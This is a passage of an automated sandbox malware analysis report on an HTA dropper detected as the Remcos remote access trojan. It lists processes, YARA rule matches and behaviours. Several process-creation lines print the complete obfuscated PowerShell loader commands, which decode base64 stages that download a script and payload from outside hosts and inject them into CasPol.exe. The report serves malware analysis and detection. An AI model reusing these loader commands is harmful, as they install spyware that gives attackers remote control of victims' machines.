hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,

12_2_004158B9

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_042487B0	8_2_042487B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_04247FF4	8_2_04247FF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_004520E2	12_2_004520E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0041D081	12_2_0041D081
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0043D0A8	12_2_0043D0A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00437160	12_2_00437160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_004361BA	12_2_004361BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00426264	12_2_00426264
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00431387	12_2_00431387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0041E5EF	12_2_0041E5EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0044C749	12_2_0044C749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_004267DB	12_2_004267DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0043C9ED	12_2_0043C9ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00432A59	12_2_00432A59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0043CC1C	12_2_0043CC1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00434D32	12_2_00434D32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0043CE4B	12_2_0043CE4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00440E30	12_2_00440E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00426E83	12_2_00426E83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00412F45	12_2_00412F45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00452F10	12_2_00452F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00426FBD	12_2_00426FBD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00401F66 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 004020E7 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 004338B5 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00433FC0 appears 55 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2055
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2022
Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2055	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2022	Jump to behavior

Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: CasPol.exe PID: 6284, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@18/16@6/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

12_2_00416AB7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

12_2_0040E219

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,

12_2_0041A64F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

12_2_00419BD4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\creamykissinglipsgoodforcreamythingswithcreamicream[1].tiff

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-PVMSPM
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4416:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3bb3oer.m1o.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS"

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: creamkissingthingswithcreambananapackagecreamy.hta	Virustotal: Detection: 40%
Source: creamkissingthingswithcreambananapackagecreamy.hta	ReversingLabs: Detection: 23%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\creamkissingthingswithcreambananapackagecreamy.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5305.tmp" "c:\Users\user\AppData\Local\Temp\yy1wu0jg\CSCCF35FBE9A0D8429B84CE9BA7B3CB93B6.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"	Jump to behavior
